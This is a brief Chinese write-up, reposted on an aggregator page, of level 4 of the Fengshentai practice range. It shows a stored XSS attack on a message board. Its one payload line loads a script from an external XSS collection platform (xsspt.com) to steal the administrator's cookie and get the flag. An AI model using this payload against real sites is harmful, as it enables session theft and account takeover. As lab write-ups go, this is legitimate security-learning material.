JavaShuo
栏目
标签
mbp 封神台靶场 四 (笔记)
时间 2021-01-11
标签
封神台靶场
繁體版
原文
原文链接
打开链接,发现是个留言板,尝试xss注入,看看是否可行。 弹出1提示并发现字段变灰,说明注入成功,登录xss平台创建项目。 将此代码段植入刚才的区域中<script src=http://xsspt.com/2gVqle></script>然后查看项目内容发现flag 总结:本关主要是通过xss注入拿到管理员cookie的,见框就插是xss注入的常用手段,它主要通过用户输入当作html语句在页面上
>>阅读原文<<
相关文章
1.
mbp 封神台靶场 一(笔记)
2.
mbp 封神台靶场 二(笔记)
3.
mbp 封神台靶场 六(笔记)
4.
mbp 封神台靶场 三 (笔记)
5.
mbp 封神台靶场 五 (笔记)
6.
封神台靶场-第四章
7.
封神台DOM XSS靶场
8.
封神台靶场writeup
9.
ctf实战 封神台的靶场 第四关通关记录
10.
封神台靶场-第二章
更多相关文章...
•
C# 封装
-
C#教程
•
ionic 平台
-
ionic 教程
•
Tomcat学习笔记(史上最全tomcat学习笔记)
•
Docker容器实战(一) - 封神Server端技术
相关标签/搜索
靶场
mbp
封神
神笔
场记
我的笔记四
笔记
靶机
Hibernate教程
MyBatis教程
NoSQL教程
0
分享到微博
分享到微信
分享到QQ
每日一句
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
1.
「插件」Runner更新Pro版,帮助设计师远离996
2.
错误 707 Could not load file or assembly ‘Newtonsoft.Json, Version=12.0.0.0, Culture=neutral, PublicKe
3.
Jenkins 2018 报告速览,Kubernetes使用率跃升235%!
4.
TVI-Android技术篇之注解Annotation
5.
android studio启动项目
6.
Android的ADIL
7.
Android卡顿的检测及优化方法汇总(线下+线上)
8.
登录注册的业务逻辑流程梳理
9.
NDK(1)创建自己的C/C++文件
10.
小菜的系统框架界面设计-你的评估是我的决策
本站公众号
欢迎关注本站公众号,获取更多信息
相关文章
1.
mbp 封神台靶场 一(笔记)
2.
mbp 封神台靶场 二(笔记)
3.
mbp 封神台靶场 六(笔记)
4.
mbp 封神台靶场 三 (笔记)
5.
mbp 封神台靶场 五 (笔记)
6.
封神台靶场-第四章
7.
封神台DOM XSS靶场
8.
封神台靶场writeup
9.
ctf实战 封神台的靶场 第四关通关记录
10.
封神台靶场-第二章
>>更多相关文章<<